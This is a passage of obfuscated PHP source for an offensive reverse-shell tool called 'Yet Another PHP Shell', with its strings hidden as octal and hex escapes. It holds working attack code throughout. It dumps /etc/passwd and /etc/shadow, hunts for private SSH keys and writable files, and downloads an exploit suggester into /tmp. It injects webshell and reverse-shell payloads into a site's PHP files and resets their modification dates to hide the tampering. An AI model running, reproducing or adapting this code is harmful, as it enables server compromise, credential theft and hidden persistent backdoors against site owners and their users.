cyan("\133\x69\135\x20\x43\162\x6f\156\164\x61\142\x3a\40\12") . run_cmd("\143\x61\164\40\57\x65\x74\143\x2f\x63\162\x6f\x6e\x74\141\142\x20\174\x20\145\147\162\x65\x70\x20\55\166\40\47\136\x23\x27") . PHP_EOL; fwrite($s, $info); fwrite($s, green("\75\x3d\75\75\x3d\x3d\75\75\x3d\x3d\75\75\75\75\75\75\75\75\x3d\x3d\75\75\40\x41\x6c\x6c\x20\x75\163\x65\162\163\40\75\x3d\75\75\75\75\75\x3d\75\x3d\75\75\x3d\75\x3d\x3d\75\x3d\75\x3d\75\x3d\xa\xa")); fwrite($s, run_cmd("\143\141\x74\40\x2f\145\164\143\57\160\x61\x73\x73\x77\x64") . PHP_EOL); if (is_readable("\57\145\x74\143\x2f\x73\x68\x61\x64\x6f\167")) { fwrite($s, red("\133\x21\135\x20\x2f\x65\164\x63\x2f\x73\150\x61\144\x6f\167\x20\x69\163\40\162\x65\x61\x64\x61\x62\154\x65\x21\12") . run_cmd("\143\141\x74\40\x2f\x65\164\143\57\x73\150\141\144\157\167") . PHP_EOL); } fwrite($s, green("\75\x3d\75\x3d\x3d\75\x3d\x3d\x3d\75\x3d\x3d\75\x3d\x3d\75\75\75\x3d\75\x3d\x3d\x20\116\x65\x74\x20\151\156\x66\157\x20\x3d\x3d\x3d\x3d\75\75\75\x3d\x3d\x3d\75\75\x3d\75\75\75\75\75\75\75\75\75\xa\xa")); $info = cyan("\x5b\x69\135\40\x49\120\40\111\156\x66\157\x3a\40\12") . run_cmd("\x69\x66\143\x6f\x6e\146\x69\x67") . PHP_EOL; $info .= cyan("\x5b\x69\135\40\x48\x6f\x73\164\163\72\x20\12") . run_cmd("\143\141\164\40\x2f\x65\164\x63\x2f\150\x6f\163\x74\163\40\x7c\40\x67\x72\x65\160\40\55\166\x20\x27\x5e\x23\x27") . PHP_EOL; $info .= cyan("\x5b\x69\x5d\40\111\x6e\x74\x65\162\x66\141\x63\x65\163\x2f\x72\x6f\165\164\x65\x73\72\40\xa") . run_cmd("\x63\x61\164\x20\57\x65\x74\x63\57\x6e\145\x74\x77\x6f\162\153\163\40\46\x26\40\x72\157\x75\164\145") . PHP_EOL; $info .= cyan("\133\x69\x5d\x20\x49\x50\40\124\141\142\x6c\x65\163\x20\162\x75\x6c\145\163\x3a\x20\12") . run_cmd("\50\x69\x70\x74\141\x62\154\145\x73\40\x2d\x2d\154\151\x73\x74\x2d\x72\165\154\145\163\x20\62\76\x2f\x64\145\166\57\x6e\x75\x6c\x6c\x29") . PHP_EOL; $info .= cyan("\x5b\151\135\40\101\x63\x74\x69\166\x65\40\x70\x6f\x72\164\x73\x3a\40\xa") . run_cmd("\50\156\x65\164\x73\x74\141\x74\x20\x2d\x70\165\156\x74\141\x29\40\x32\76\57\144\x65\166\57\156\165\154\x6c") . PHP_EOL; fwrite($s, $info); fwrite($s, green("\75\75\75\75\x3d\x3d\x3d\x3d\x3d\x3d\75\75\x3d\x3d\x3d\75\x3d\x3d\x3d\x3d\x3d\75\40\111\x6e\164\x65\162\145\163\164\x69\156\x67\40\x62\x69\156\141\x72\x69\x65\x73\40\x3d\x3d\75\75\75\x3d\75\75\75\75\75\x3d\75\75\75\x3d\x3d\x3d\75\75\x3d\75\12\12")); $interesting_binaries = array("\156\x63", "\x6e\143\x2e\164\x72\x61\x64\151\x74\151\x6f\x6e\x61\x6c", "\156\143\141\x74", "\156\155\141\x70", "\x70\x65\162\154", "\x70\x79\x74\150\x6f\156", "\x70\171\x74\150\x6f\156\x32", "\x70\x79\x74\x68\x6f\x6e\x32\x2e\66", "\160\171\x74\x68\x6f\156\x32\x2e\67", "\x70\171\164\x68\x6f\156\x33", "\x70\171\x74\x68\x6f\x6e\x33\56\66", "\160\171\x74\x68\157\x6e\x33\x2e\x37", "\x72\x75\x62\x79", "\x6e\x6f\x64\x65", "\147\143\x63", "\147\53\x2b", "\144\x6f\143\x6b\145\x72", "\160\150\x70"); foreach ($interesting_binaries as $binary) { $binary = shell_exec("\x77\150\151\143\x68\40{$binary}\x20\x32\x3e\x2f\144\x65\166\57\156\x75\154\154"); if ($binary !== '' && base64_encode($binary . PHP_EOL) !== "\x43\147\75\x3d") { fwrite($s, run_cmd("\x6c\163\40\55\154\x20{$binary}")); } } fwrite($s, green("\12\x3d\x3d\75\75\x3d\75\75\75\x3d\x3d\x3d\75\x3d\75\75\x3d\75\75\75\75\x3d\x3d\x20\123\x55\111\x44\40\142\x69\156\x61\162\x69\145\x73\x20\75\75\75\75\x3d\75\75\x3d\x3d\75\75\75\x3d\x3d\x3d\75\x3d\x3d\x3d\75\x3d\x3d\12\xa")); $suid_list = explode("\12", shell_exec("\146\151\x6e\144\x20\x2f\x20\55\164\x79\x70\x65\x20\x66\x20\55\160\145\162\155\x20\x2f\64\60\x30\x30\x20\62\x3e\57\144\x65\x76\x2f\156\x75\154\x6c")); foreach ($suid_list as $suid) { if ($suid !== '') { fwrite($s, run_cmd("\154\163\40\55\154\x20{$suid}")); } } fwrite($s, green("\xa\x3d\75\x3d\x3d\x3d\x3d\x3d\x3d\75\75\x3d\x3d\x3d\75\x3d\75\75\75\75\x3d\75\75\40\123\x53\x48\x20\146\151\154\x65\163\x20\75\x3d\x3d\75\75\x3d\x3d\x3d\75\75\x3d\x3d\75\x3d\75\x3d\x3d\75\x3d\x3d\75\75\xa\12")); $authorized_keys = explode("\12", shell_exec("\146\x69\x6e\x64\x20\x2f\x20\x2d\x74\171\160\145\x20\146\x20\x2d\x6e\x61\x6d\145\x20\141\165\x74\x68\157\162\x69\x7a\x65\144\137\153\x65\171\163\40\62\76\57\144\145\x76\x2f\x6e\x75\154\154")); foreach ($authorized_keys as $public_key) { if (is_writable($public_key)) { fwrite($s, red("\x5b\127\x72\151\x74\x61\x62\154\145\x5d\40") . $public_key . PHP_EOL); } else { fwrite($s, $public_key . PHP_EOL); } } $id_rsa = explode("\12", shell_exec("\146\151\156\144\x20\x2f\x20\x2d\x74\x79\x70\145\x20\x66\x20\x2d\x6e\141\x6d\145\x20\x69\144\x5f\162\163\x61\40\62\x3e\x2f\x64\x65\166\57\156\165\154\x6c")); foreach ($id_rsa as $priv_key) { if (is_readable($priv_key)) { fwrite($s, red("\133\122\145\141\144\x61\142\154\x65\x5d\x20") . $priv_key . PHP_EOL); } else { fwrite($s, $priv_key . PHP_EOL); } } fwrite($s, green("\12\75\75\x3d\x3d\x3d\75\x3d\75\x3d\75\x3d\75\x3d\75\x3d\x3d\x3d\75\x3d\40\x57\162\x69\164\x61\142\x6c\x65\40\120\110\120\x20\x66\151\x6c\x65\x73\x20\75\75\x3d\x3d\x3d\75\x3d\75\x3d\x3d\75\75\x3d\75\75\x3d\75\x3d\x3d\xa\12")); $webfiles_arr = array(); $webdir = array("\x2f\x76\x61\162\x2f\x77\x77\x77", "\57\x73\162\166", "\57\x75\x73\x72\x2f\x6c\x6f\143\x61\x6c\x2f\141\x70\141\x63\150\145\62", "\x2f\166\x61\162\x2f\x61\x70\141\143\x68\145\62", "\x2f\x76\x61\x72\57\167\x77\167\57\x6e\147\x69\x6e\170\x2d\144\145\146\x61\x75\154\164"); foreach ($webdir as $dir) { $webfiles_arr = array_merge($webfiles_arr, explode("\12", shell_exec("\x66\x69\x6e\x64\x20" . $dir . "\x20\x2d\164\171\x70\x65\40\x66\40\x2d\156\x61\155\145\x20\x27\52\x2e\x70\x68\x70\x2a\47\40\55\x77\x72\x69\164\x61\142\154\145\40\62\76\57\x64\145\166\x2f\x6e\x75\x6c\154"))); } if (count($webfiles_arr) > 25) { for ($i = 0; $i < 25; $i++) { if ($webfiles_arr[$i] !== '') { fwrite($s, red("\133\x57\162\x69\164\141\x62\154\145\135\40") . $webfiles_arr[$i] . PHP_EOL); } } fwrite($s, "\56\56\x2e\12\56\x2e\x2e" . PHP_EOL); fwrite($s, green("\x5b\53\135\40") . "\123\150\x6f\167\x69\156\147\40\x6f\x6e\154\x79\40\164\x68\145\x20\x66\151\162\x73\x74\40\x32\65\x20\x66\151\154\145\x73\56\x20\124\150\x65\162\x65\x20\x61\162\145\x20\155\157\x72\x65\41" . PHP_EOL); } else { foreach ($webfiles_arr as $file) { if ($file !== '') { fwrite($s, red("\x5b\127\x72\151\x74\141\142\154\145\x5d\40") . $file . PHP_EOL); } } } fwrite($s, cyan("\12\x5b\x69\135") . "\40\x47\x65\x74\40\155\157\x72\145\40\x69\156\146\x6f\162\155\141\x74\x69\157\156\x20\167\151\164\150\x20\x21\145\x6e\165\x6d\x2e" . PHP_EOL); } goto Sjo8m; KkL02: set_time_limit(0); goto kXDc2; QBC7U: $commands = array("\x61\154\x6c\55\x63\157\154\157\x72\x73", "\143\x6f\154\x6f\x72", "\x64\165\160\154\x69\x63\141\164\x65", "\x65\x6e\165\x6d", "\x68\145\x6c\160", "\x69\x6e\x66\x65\143\x74", "\x69\x6e\x66\157", "\160\141\x73\163\167\x64", "\x70\x68\x70", "\x73\164\x61\x62\151\x6c\151\x7a\145", "\163\165\147\x67\145\163\164\145\x72"); goto UVSoS; Wuvgt: function refresh_ps1($changecolor = false) { global $ps1_color, $ps1; $user = str_replace(PHP_EOL, '', run_cmd("\167\150\157\x61\x6d\151")); if (!$ps1_color) { $ps1 = white("\x5b\x59\101\x50\x53\135\40") . str_replace(PHP_EOL, '', green($user . "\100" . run_cmd("\150\157\163\164\x6e\141\155\145")) . "\x3a" . cyan(run_cmd("\160\167\144")) . "\44\x20"); if ($user == "\x72\x6f\157\164") { $ps1 = white("\x5b\x59\x41\120\123\x5d\x20") . str_replace(PHP_EOL, '', red($user . "\100" . run_cmd("\150\157\163\x74\x6e\x61\x6d\x65")) . "\x3a" . cyan(run_cmd("\160\167\144")) . "\x23\40"); } if ($changecolor) { $ps1_color = true; } } else { $ps1 = white("\133\x59\101\120\123\x5d\40") . str_replace(PHP_EOL, '', $user . "\x40" . run_cmd("\x68\157\163\164\156\x61\x6d\145") . "\x3a" . run_cmd("\160\167\x64") . "\x24\x20"); if ($user == "\x72\157\x6f\x74") { $ps1 = white("\133\x59\101\x50\x53\135\40") . str_replace(PHP_EOL, '', $user . "\x40" . run_cmd("\150\157\x73\164\x6e\141\155\x65") . "\x3a" . run_cmd("\x70\167\x64") . "\x23\x20"); } if ($changecolor) { $ps1_color = false; } } } goto gxovs; vng9E: function infect($allFiles, $fileArr, $payload_index, $payload_list, $position = 1) { global $s; $payload = $payload_list[array_keys($payload_list)[$payload_index]]; fwrite($s, yellow("\xa\x5b\41\x5d\40") . white("\x46\151\154\x65\x73\40\164\157\40\x69\x6e\146\x65\x63\164\72\12")); foreach ($fileArr as $fileToInfect) { fwrite($s, $allFiles[$fileToInfect] . "\12"); } fwrite($s, yellow("\133\41\135\40") . white("\x50\x61\x79\154\x6f\x61\144\72\x20") . $payload_list[array_keys($payload_list)[$payload_index]] . "\xa"); $position_str = $position ? "\105\156\x64\40\x6f\x66\x20\146\151\x6c\x65" : "\102\x65\x67\151\156\156\151\x67\40\157\146\x20\146\x69\154\x65"; fwrite($s, yellow("\x5b\41\135\x20") . white("\x50\x6f\163\151\164\x69\157\x6e\x3a\40") . $position_str . "\12"); fwrite($s, cyan("\133\x3f\135\x20") . white("\x41\x72\145\40\171\x6f\x75\40\x73\x75\x72\x65\40\x79\157\165\40\x77\141\156\164\40\x74\157\x20\151\x6e\146\x65\x63\x74\x20\x74\150\157\x73\x65\40\146\151\x6c\x65\163\77\40\x5b\131\x2f\x6e\x5d")); while ($sure = fread($s, 128)) { if (strtolower(substr($sure, 0, 1)) == "\156") { return; } break; } foreach ($fileArr as $fileToInfect) { $filePath = $allFiles[$fileToInfect]; if (isAvailable("\x66\x69\154\145\137\147\145\164\137\x63\x6f\156\x74\145\156\164\163") && isAvailable("\x66\151\154\x65\137\x70\x75\x74\137\x63\157\156\x74\x65\156\x74\x73")) { $old = file_get_contents($filePath); $originalDate = str_replace("\12", '', run_cmd("\163\164\x61\x74\x20" . $filePath . "\x20\174\x20\x67\162\x65\x70\x20\115\157\144\151\146\171\40\174\40\163\x65\x64\40\x22\x73\57\115\157\x64\151\x66\171\72\40\57\57\x22")); if ($position) { $written = file_put_contents($filePath, "\xa" . $payload, FILE_APPEND) ? 1 : 0; } else { $written = file_put_contents($filePath, $payload . "\xa" . $old) ? 1 : 0; } $result = $written ? green("\x5b\53\x5d\x20") . white($filePath . "\40\167\141\x73\40\x69\x6e\146\145\x63\164\x65\144\x20\x77\151\164\150\40\160\x61\171\x6c\x6f\x61\x64\x20\41") : red("\133\55\135\x20") . white($filePath . "\x20\x45\x72\x72\157\162\x21"); fwrite($s, $result . "\xa"); if (run_cmd("\164\157\x75\143\150\x20\55\x64\40" . "\x22" . $originalDate . "\x22\x20" . $filePath)) { fwrite($s, green("\x5b\53\135\40") . white("\115\x61\156\164\x61\x69\156\145\144\40\x6f\162\x69\x67\x69\x6e\141\x6c\x20\x27\155\x6f\x64\151\x66\x69\x65\144\40\x64\x61\x74\145\47\40\x28" . $originalDate . "\x29\x2e\12")); } } } return; } goto idP0M; EKCVq: $long_args = array("\x75\x70\x64\x61\x74\145\72\x3a", "\150\x65\154\160\72\72", "\x73\x69\x6c\x65\x6e\164\72\x3a"); goto iyx8E; kemz6: $salt = "\166\137\x33\137\x72\x5f\x59\137\x5f\137\107\137\157\x5f\60\137\144\137\x5f\x5f\163\137\x34\x5f\114\x5f\164"; goto CXh7h; o75dl: function runPHP($code) { try { ob_start(); eval($code); $result = ob_get_contents(); ob_end_clean(); } catch (Throwable $ex) { $err = explode("\123\x74\141\143\153\40\x74\162\141\x63\145\x3a", $ex); $result = $err[0]; } return $result; } goto Wym75; jsOgp: function getFiles($dir) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir)); $list = array(); foreach ($iterator as $file) { if (!is_dir($file) && is_writable($file)) { if ($file->getPathName() !== $_SERVER["\123\103\122\111\x50\x54\137\106\x49\x4c\x45\116\101\115\x45"]) { if (substr($file->getPathName(), -4) == "\56\160\x68\160") { array_push($list, $file->getPathName()); } } } } sort($list); return $list; } goto lGppC; sfKGX: function toggle_password() { global $use_password, $s, $yaps; $yaps_code = file_get_contents($yaps); if ($use_password) { $new_yaps_code = preg_replace("\57\50\x5c\x24\165\x73\x65\137\160\x61\163\x73\x77\x6f\162\144\40\53\75\x20\x2b\x29\x28\164\x72\165\x65\51\x2f", "\44\x31\146\141\x6c\163\145", $yaps_code, 1); if (file_put_contents($yaps, $new_yaps_code)) { $use_password = false; fwrite($s, green("\133\x2b\x5d\x20") . "\120\141\163\x73\167\157\162\x64\x20\x64\x65\x61\143\164\151\x76\x61\164\145\144\x2e\12"); return true; } fwrite($s, red("\133\x2d\x5d\40") . "\103\157\165\x6c\x64\x6e\47\164\x20\x64\145\141\x63\x74\151\x76\x61\164\x65\40\160\x61\163\x73\167\157\162\x64\56\xa"); return false; } $new_yaps_code = preg_replace("\x2f\x28\x5c\44\x75\x73\x65\x5f\x70\x61\x73\163\x77\157\162\144\x20\x2b\x3d\x20\x2b\x29\x28\146\141\154\163\x65\51\x2f", "\44\61\164\162\x75\145", $yaps_code, 1); if (file_put_contents($yaps, $new_yaps_code)) { $use_password = false; fwrite($s, green("\x5b\x2b\135\40") . "\120\141\163\x73\x77\x6f\162\x64\x20\141\143\x74\151\166\x61\x74\145\144\x2e\xa"); return true; } fwrite($s, red("\133\x2d\x5d\x20") . "\103\x6f\165\154\x64\156\47\x74\40\x61\x63\164\151\166\141\x74\145\40\x70\x61\x73\163\167\x6f\x72\x64\56\12"); return false; } goto WYwps; pGTWf: if (isset($options["\165"]) || isset($options["\165\160\x64\x61\x74\x65"])) { die(verify_update()); } goto MwOOd; rHlHg: function get_request($url) { $response = false; if (isAvailable("\146\x69\x6c\x65\137\x67\x65\164\x5f\143\157\x6e\x74\x65\x6e\164\x73")) { $response = file_get_contents($url); } elseif (isAvailable("\146\162\145\141\144") && isAvailable("\x66\157\x70\x65\156") && ini_get("\x61\x6c\154\157\x77\137\x75\162\x6c\x5f\146\157\x70\x65\156")) { $response = fread(fopen($url, "\x72"), 10); } elseif (in_array("\x63\x75\x72\x6c", get_loaded_extensions())) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $response = curl_exec($ch); curl_close($ch); } elseif ($tmp_curl = run_cmd("\143\165\x72\154\x20\x2d\163\x20" . $url)) { $response = $tmp_curl; } elseif ($tmp_wget = run_cmd("\x77\147\145\164\x20\55\161\x4f\55\40" . $url)) { $response = $tmp_wget; } return $response; } goto MIocV; zJ69L: if (php_sapi_name() == "\143\x6c\x69") { if ($argc >= 2 && preg_match("\57\x5e\x5b\x30\x2d\x39\135\53\x24\57", $argv[$argc - 1])) { $port = $argv[$argc - 1]; $ip = $argv[$argc - 2]; } else { foreach ($argv as $arg) { if (strpos($arg, "\72") !== false) { $socket = explode("\x3a", $arg); $ip = $socket[0]; $port = (int) $socket[1]; } } } } goto QBC7U; UVSoS: function green($str) { global $color; return $color ? "\33\x5b\71\x32\155" . $str . "\x1b\x5b\x30\x6d" : $str; } goto uFC47; idP0M: function parse_stdin($input) { global $s, $color; switch (substr($input, 0, -1)) { case "\x21\141\x6c\x6c\x2d\143\x6f\x6c\x6f\x72\x73": $color = !$color; break; case "\x21\151\x6e\146\x6f": return sysinfo(); break; case "\x21\145\x6e\x75\155": return enum(); break; case "\41\163\x75\147\x67\x65\163\164\x65\x72": return suggester(); break; case "\x21\143\157\154\x6f\x72": refresh_ps1(true); break; case "\x21\x68\145\154\160": return help(); break; case "\x21\160\150\x70": $phpCode = getPHP(); if ($phpCode !== 0) { $result = runPHP($phpCode); fwrite($s, $result); } else { fwrite($s, yellow("\133\151\x5d\40\103\x6f\x64\x65\x20\143\x61\156\x63\x65\x6c\x65\x64\56") . PHP_EOL); } break; case "\x21\163\164\141\x62\x69\x6c\151\172\x65": stabilize(); break; case "\41\x62\141\143\153\144\x6f\x6f\x72": backdoor(); break; case "\x21\160\141\163\x73\x77\144": passwd(); break; case "\41\x64\165\160\154\151\x63\141\164\145": duplicate(); break; case "\x21\x69\x6e\x66\145\x63\164": select_files(); break; } } goto f9SPd; k28_t: if (isset($options["\x68"]) || isset($options["\x68\x65\x6c\160"])) { die(usage()); } goto pGTWf; ssUNI: function change_password($new) { global $salt, $yaps, $s; $new_hash = hash("\x73\x68\141\65\61\62", $salt . hash("\163\x68\x61\65\61\62", $new, false), false); if (!is_readable($yaps) || !is_writable($yaps)) { return false; } $yaps_code = file_get_contents($yaps); $new_yaps_code = preg_replace("\57\133\141\x2d\x66\x30\x2d\x39\x5d\x7b\61\x32\70\175\57", $new_hash, $yaps_code, 1); if (file_put_contents($yaps, $new_yaps_code)) { fwrite($s, green("\x5b\x2b\135\x20") . "\x50\x61\163\x73\x77\x6f\162\144\40\143\x68\x61\x6e\x67\145\x64\x2e\40\103\x68\x61\156\147\x65\163\40\167\x69\x6c\154\40\164\141\x6b\x65\40\x65\146\x66\x65\143\164\40\x6f\x6e\x20\156\x65\x78\x74\x20\143\157\156\x6e\145\143\x74\151\157\156\x2e\xa"); return true; } else { fwrite($s, red("\x5b\x2d\x5d\40") . "\103\x6f\x75\154\144\156\47\164\x20\x72\145\141\x64\x20\157\162\40\167\x72\151\164\x65\x20\164\150\x65\x20\146\151\154\x65\x2e\40\x41\x72\145\x20\164\150\x65\x20\160\145\x72\x6d\x69\163\163\x69\x6f\x6e\x73\x20\x72\151\147\x68\164\x3f\xa" . run_cmd("\154\x73\x20\x2d\154\x20" . $yaps . "\12")); return false; } } goto sfKGX; oxSzT: $banner = cyan("\12\x20\40\x20\x20\x20\x20\40\x6f\x20\40\40\x6f\x20\x20\40\117\x20\x20\40\x20\x6f\55\x2d\157\x20\40\x20\157\x2d\157\xa\x20\x20\40\x20\40\40\40\40\x5c\40\57\40\x20\40\57\40\134\40\x20\x20\x7c\40\x20\40\x29\x20\x28\xa\x20\40\40\x20\x20\x20\x20\x20\40\x4f\40\x20\x20\x6f\55\x2d\x2d\157\x20\x20\117\55\x2d\x6f\x20\x20\x20\157\x2d\x6f\12\40\x20\x20\x20\40\x20\x20\40\x20\174\x20\x20\x20\174\40\x20\40\174\40\x20\x7c\x20\40\x20\40\x20\40\x20\x20\x20\x29\12\x20\x20\x20\x20\40\x20\x20\x20\x20\x6f\x20\40\x20\x6f\40\40\40\x6f\x20\x20\157\x20\x20\x20\40\40\157\x2d\x2d\x6f\12\40\x20\x20\x20\x20\40\x20\40\x59\145\x74\40\101\156\157\x74\x68\x65\x72\40\x20\120\110\x50\40\40\123\x68\x65\x6c\x6c") . "\xa\40\40\x20\x20\x20\x20\x20\x20\x20\40\40\40\40\x20\x56\x65\162\x73\x69\x6f\x6e\x20" . $version . "\12\40\x20\x20\40\40\40\x20\x43\157\x64\145\162\x3a\x20\116\x69\x63\150\x6f\x6c\141\163\40\x46\x65\x72\x72\145\x69\x72\x61"; goto gn8lq; mBQZf: $yaps = $_SERVER["\x53\103\x52\x49\x50\124\137\x46\111\x4c\x45\x4e\101\x4d\x45"]; goto TwUwH; V18g8: function choose_payload($allFiles, $toInfect) { global $s; $payloads = array("\60\x2e\40\124\x69\156\171\x52\x43\x45\x9" => "\74\77\x3d\x60\44\137\x52\x45\121\125\105\123\124\133\60\x5d\x60\73\77\76", "\x31\x2e\x20\103\x6c\141\x73\x73\x69\143\x52\103\105\x9" => "\x3c\x3f\75\100\163\171\163\x74\x65\155\x28\x24\x5f\x52\x45\121\x55\105\123\124\133\60\x5d\51\x3b\x3f\x3e", "\x32\x2e\x20\x45\x76\x61\x6c\x9\x9" => "\x3c\77\x3d\100\145\x76\141\x6c\50\44\137\122\x45\121\x55\x45\x53\x54\133\60\x5d\51\x3b\77\x3e", "\x33\56\x20\102\141\x73\145\144\105\166\141\154\x9" => "\x3c\x3f\x3d\x40\145\166\141\154\x28\x62\141\163\145\x36\x34\x5f\x64\x65\143\x6f\144\x65\50\x24\x5f\x52\105\121\125\x45\x53\x54\133\x30\x5d\51\51\x3b\77\x3e", "\64\x2e\x20\x52\x65\155\x6f\164\145\x50\x48\x50\11" => "\74\77\75\x40\x65\x76\x61\x6c\50\x66\151\154\145\137\x67\x65\164\137\143\157\156\164\145\x6e\164\x73\x28\x24\137\122\105\x51\x55\105\x53\x54\133\x30\x5d\51\x29\73\77\76", "\65\56\40\122\x65\155\x6f\164\x65\125\x70\x6c\157\x61\x64\x9" => "\74\77\75\44\170\75\162\x61\x6e\144\x28\61\x30\60\x2c\71\x39\x39\51\73\100\146\x69\x6c\x65\x5f\x70\165\164\x5f\x63\157\156\x74\145\x6e\164\x73\x28\x22\x2e\x2f\x22\x2e\44\x78\56\x22\56\x22\56\x24\x5f\x52\105\121\125\105\123\124\x5b\x31\x5d\x2c\x40\x66\151\x6c\x65\137\x67\145\x74\137\143\x6f\x6e\x74\145\x6e\x74\163\x28\44\x5f\x52\105\121\x55\x45\123\x54\133\60\135\51\x29\x3b\x65\x63\150\x6f\x20\44\170\x2e\44\x5f\x52\x45\x51\125\x45\x53\124\x5b\61\x5d\x3b\x3f\76", "\66\x2e\x20\x4c\157\143\x61\154\x55\160\x6c\157\141\144\x9" => "\74\x3f\160\150\160\40\151\146\50\151\x73\163\x65\x74\50\44\x5f\106\111\114\105\123\x5b\x22\x30\42\x5d\x29\51\x69\x66\x28\155\157\x76\x65\x5f\165\x70\x6c\157\141\x64\145\x64\x5f\146\x69\x6c\x65\50\44\x5f\106\111\x4c\105\x53\133\x22\x30\x22\x5d\x5b\42\164\155\160\x5f\156\x61\x6d\x65\42\135\x2c\42\137\42\x2e\x24\x5f\x46\111\114\105\123\133\x22\x30\x22\x5d\133\x22\x6e\x61\x6d\145\x22\135\x29\51\x65\x63\150\157\42\125\160\x6c\157\141\144\145\x64\72\x20\x5f\x22\56\x24\x5f\x46\111\x4c\105\123\133\42\x30\x22\135\133\42\x6e\141\155\145\x22\x5d\73\x3f\76", "\x37\x2e\40\123\164\x61\x62\x6c\145\x53\150\145\x6c\x6c\x9" => "\x3c\x3f\x70\150\x70\x20\x24\141\75\42\x73\143\162\x69\x70\164\40\55\x71\x63\40\x2f\142\x69\156\57\x62\141\x73\x68\40\x2f\x64\x65\x76\x2f\x6e\165\154\x6c\42\73\x75\155\141\163\x6b\50\60\x29\73\44\x62\75\146\163\157\x63\x6b\x6f\x70\x65\156\x28\x24\137\122\105\121\x55\105\123\124\133\60\x5d\54\x24\x5f\122\105\x51\125\x45\123\x54\133\61\x5d\54\44\143\x2c\44\144\54\63\x30\51\73\44\145\x3d\x61\162\x72\x61\x79\50\x30\x3d\x3e\141\162\x72\x61\171\50\x22\x70\x69\160\x65\42\54\42\x72\x22\x29\x2c\x31\x3d\76\141\x72\162\x61\171\50\x22\160\151\160\145\x22\54\42\x77\x22\51\x2c\x32\x3d\x3e\141\162\x72\x61\171\50\x22\x70\x69\x70\145\42\x2c\42\167\x22\51\x29\73\x24\146\75\160\x72\157\143\137\x6f\x70\x65\156\x28\x24\x61\54\x24\145\x2c\x24\147\51\73\146\157\x72\145\x61\x63\x68\50\44\x67\x20\x61\x73\40\44\x70\51\x73\x74\162\145\141\x6d\137\x73\x65\164\x5f\142\x6c\157\x63\153\x69\156\x67\x28\44\160\54\x30\x29\73\163\164\162\145\x61\155\137\163\x65\164\x5f\x62\x6c\x6f\143\x6b\x69\156\x67\x28\x24\x62\x2c\x30\x29\73\x77\x68\151\154\x65\50\x21\x66\x65\x6f\x66\50\x24\142\51\51\x7b\44\151\x3d\x61\162\162\x61\x79\x28\x24\x62\x2c\44\x67\133\x31\x5d\x2c\x24\147\133\62\135\x29\x3b\x69\146\50\151\156\x5f\x61\162\162\x61\171\x28\x24\142\54\x24\x69\51\x29\146\167\x72\x69\x74\145\50\x24\x67\133\60\x5d\x2c\146\162\145\x61\x64\50\44\142\x2c\62\x30\64\x38\51\x29\x3b\x69\x66\x28\x69\156\x5f\141\x72\162\x61\x79\x28\x24\147\x5b\61\x5d\54\x24\x69\x29\x29\x66\167\162\151\x74\145\x28\x24\142\x2c\x66\162\145\x61\144\x28\44\147\x5b\61\135\x2c\x32\60\x34\70\51\x29\73\151\x66\x28\x69\156\x5f\141\162\x72\x61\171\50\x24\147\133\62\135\x2c\x24\151\51\x29\x66\x77\x72\x69\x74\145\x28\x24\142\54\x66\162\145\x61\x64\50\x24\147\133\62\135\x2c\x32\x30\x34\70\x29\51\73\x7d\146\143\x6c\157\163\145\x28\44\142\51\73\x66\x6f\162\x65\141\x63\x68\50\x24\147\40\141\x73\x20\44\160\51\146\143\x6c\157\x73\145\x28\44\160\x29\x3b\160\x72\157\143\x5f\x63\154\x6f\x73\x65\x28\44\x66\51\73\x3f\76"); fwrite($s, cyan("\12\x5b\x69\x5d\x20") . white("\x4c\x69\163\x74\40\x6f\146\x20\160\x61\171\x6c\x6f\x61\144\x73\40\x61\166\141\x69\154\141\x62\x6c\145\72\12")); $i = true; foreach ($payloads as $name => $code) { $desc = $i ? cyan($name) . $code : cyan($name) . white($code); fwrite($s, $desc . "\12"); $i = !$i; } fwrite($s, cyan("\12\x5b\x3f\135\40") . white("\x43\x68\x6f\157\163\x65\x20\x61\x20\x70\x61\x79\x6c\x6f\x61\144\x20\164\157\40\x69\x6e\146\x65\143\164\40\164\150\x65\40\x73\x65\x6c\145\143\164\x65\144\x20\x66\x69\154\145\x73\x20\50\144\x65\146\141\x75\154\164\x3a\x30\x29\x3a\40")); while ($choosed_payload = fread($s, 128)) { $user_payload = 0; if ((int) $choosed_payload <= count($payloads) + 1) { $user_payload = $choosed_payload; } break; } fwrite($s, cyan("\x5b\77\x5d\x20") . white("\x44\x6f\40\171\157\165\x20\x77\141\156\x74\x20\x64\x6f\x20\151\156\163\x65\x72\x74\40\x74\150\145\40\x70\x61\x79\x6c\x6f\141\144\40\x61\x74\x20\x74\x68\145\40\x62\x65\147\x69\156\x6e\x69\156\x67\x20\133\x30\135\x20\x6f\162\x20\145\x6e\144\40\133\x31\135\x20\x6f\146\40\164\150\x65\x20\146\151\x6c\x65\40\50\x64\x65\x66\x61\165\154\164\72\40\61\x29\x3f\40")); while ($position = fread($s, 128)) { $position = 1; if ((int) $position === 0) { $position = 0; } break; } infect($allFiles, $toInfect, (int) $user_payload, $payloads, (int) $position); return; } goto vng9E; x3nOo: function white($str) { global $color; return $color ? "\x1b\x5b\x39\x37\155" . $str . "\x1b\x5b\60\x6d" : $str; } goto ixO3W; r2M4e: function suggester() { global $s, $resources; $download = download($resources["\x73\x75\147\x67\x65\163\164\x65\x72"], "\x2f\x74\x6d\x70\57"); if ($download) { fwrite($s, green("\x5b\53\x5d") . "\x20\114\x69\x6e\x75\x78\40\x45\x78\x70\x6c\157\151\164\x20\123\165\147\x67\x65\163\164\x65\162\x20\163\x61\166\145\144\40\164\x6f\x20\x2f\x74\x6d\160\57" . $download . cyan("\12\x5b\x69\135") . "\40\x43\150\x61\156\x67\x69\156\x67\x20\160\x65\x72\x6d\x69\163\163\151\157\x6e\x73\x2e\56\56\12"); if (chmod("\57\x74\x6d\160\57" . $download, 777)) { fwrite($s, green("\x5b\x2b\135") . "\40\120\x65\162\x6d\151\x73\x73\151\x6f\x6e\x73\40\143\150\141\x6e\147\145\144\x21\40\12\x5b\x69\x5d\x20\131\x6f\x75\40\143\141\x6e\40\x72\x75\156\x20\151\x74\40\x77\151\164\x68\40" . yellow("\163\x68\40\57\164\155\160\x2f" . $download . "\40\174\40\x74\x65\x65\40\x2f\x74\155\x70\x2f\x4c\105\123\56\x6c\157\147\xa")); } else { fwrite($s, yellow("\133\41\x5d") . 